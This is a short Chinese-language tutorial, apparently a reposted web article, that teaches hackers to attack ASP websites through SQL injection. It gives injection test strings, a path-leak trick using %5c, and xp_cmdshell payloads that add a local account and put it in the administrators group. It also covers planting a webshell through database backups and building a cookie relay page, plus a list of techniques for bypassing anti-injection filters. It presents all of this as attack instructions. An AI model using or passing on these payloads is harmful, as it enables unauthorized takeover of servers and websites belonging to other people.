脚本入侵讲解-asp注入漏洞

来源:互联网 发布:广元广电网络客服电话 编辑:程序博客网 时间:2024/05/17 02:17
1:注入漏洞
------------
1.asp手工注入
第一步:
先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。
否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。
http://www.hack92.com/hack92.asp?id=1
我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了!
2:注入点爆库方法
先举个例子一个注入http://www.hack92.com/asp/hack92.asp?id=1
然后改成爆库http://www.hack92.com/asp%5chack92.asp?id=1
利用%5c爆数据库
3:注入点sa权拿服务器
注入点http://www.hack92.com/hack92.asp?id=1
是否存在xp_cmdshell
and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
--用xp_cmdshell执行命令
;exec master..xp_cmdshell"net user name password /add"--
;exec master..xp_cmdshell"net localgroup name administrators /add"--
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
这几个工具用命令建立账号密码
4:注入点db_owner权限备份webhsell 大家可以去百度搜索db_owner权限备份文章等等 或教程
当然我们可以直接让工具来帮我们搞定。这一类工具有啊D,Domain,NBSI,HDSI,等等
列目录,找网站路径 然后数据库备份上我们的asp小马.大马或一句话。然后得到webshell
5:中转注入和突破防注入程序
我们是否可以用什么方法绕过SQL注入的限制呢
我就说下长用的cookie注入
http://www.hack92.com/hack92.asp?id=1 一个防注入的地址
我们来搭建个www先 然后打开 注入中转生成器
然后选择cookie
注入键名:写参数:id=
注入url地址写上:http://www.hack92.com/hack92.asp
来源页:写上:http://www.hack92.com/hack92.asp
post提交值写上:jmdcw=1
然后点击生成asp 目录就出现了一个jmCook.asp
把文件放在我们的搭建个www里
比如:http://127.0.0.1/jmCook.asp?jmdcw=1 然后注入

方法:
中转注入 有post cookie gel注入
1、运用编码技术绕过
2、通过空格绕过
3、运用字符串判断代替
4、通过类型转换修饰符N绕过
5、通过+号拆解字符串绕过
7、通过IN绕过
8、运用注释语句绕过
9:抓取cookies然后中转
等等!大家可以去百度搜索 工具和教程 文章
突破防注入程序
通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库
分析程序源码
然后突破
原创粉丝点击